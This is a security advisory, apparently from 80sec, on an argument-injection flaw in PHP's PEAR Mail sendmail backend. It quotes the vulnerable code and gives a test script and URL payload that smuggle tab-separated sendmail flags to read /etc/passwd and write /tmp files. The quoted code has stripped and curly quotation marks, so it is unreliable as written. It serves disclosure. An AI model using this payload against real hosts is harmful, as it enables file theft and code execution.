Arbitrary File read/write vulnerability in php pear mail package

Vulnerability Description: PEAR is the official open-source class library of PHP, short for PHP Extension and Application Repository. PEAR compiles common functions in PHP program development into class libraries, covering page presentation, database access, file operations, data structures, cache operations, network protocols, and many other aspects, you can use it easily. It is a code repository for PHP extensions and applications. In short, PEAR is the cpan of PHP. However, 80sec found that the Pear Mail module has a security vulnerability. In some cases, users may read and write arbitrary files in the operating system on the host with the webserver permission, and then control the host to execute php code.
Vulnerability analysis: the PEAR Mail package uses escapeShellCmd to incorrectly filter user parameters passed into the sendmail command. After you submit a specially crafted parameter, you can call other sendmail parameters, you can read and write arbitrary files on the operating system.


Sendmail.php

......
if (!isset($from)) {
return PEAR::raiseError(No from address given.);
} elseif (strpos($from, ) !== false ||
strpos($from, ;) !== false ||
strpos($from, &) !== false ||
strpos($from, `) !== false) {
return PEAR::raiseError(From address specified with dangerous characters.);
}

$from = escapeShellCmd($from);
$mail = @popen($this->sendmail_path . (!empty($this->sendmail_args) ? . $this->sendmail_args : ) . " -f$from -- $recipients", w);
if (!$mail) {
return PEAR::raiseError(Failed to open sendmail [ . $this->sendmail_path . ] for execution.’);
}
……

We can see that the $ from variable is not completely filtered. Because escapeShellCmd will replace the equal character with null, it can bypass the space check, while escapeshellcmd does not check the parameter call, therefore, security vulnerabilities may occur.

Vulnerability Testing:


<?php
ini_set(include_path,ini_get(include_path).:/usr/local/lib/php/PEAR:);
require_once("Mail.php");
$from = "From: " . $_REQUEST[email] . “”;
$to = “xxxxxxx@zzzz.com”;
$subj = “subscription request”;
$body = “subscribe me”;
$hdrs = array(
“To” => $to,
“Cc” => $cc,
“Bcc” => $bcc,
“From” => $from,
“Subject” => $subject,
);
$body=”test”;
$mail =& Mail::factory(’sendmail’);
$mail->send($to, $hdrs, $body);
?>

Http://www.80sec.com/index.php? 1 = 3 & email = xxxxx % 09-C % 09/etc/passwd % 09-X % 09/tmp/wokao % 09zzz @ x % 09.com& l = 2 & 1 = 3

You can see the exploitation of this vulnerability.

Vulnerability impact: All PEAR Mail function packages
Vulnerability status: official notification

The content on this site is original. For reprinted content, be sure to keep your signatures and links!
Html "> Arbitrary File read/write vulnerability in php pear mail package: Http://www.80sec.com/php-pear-mail-package-security-hol.html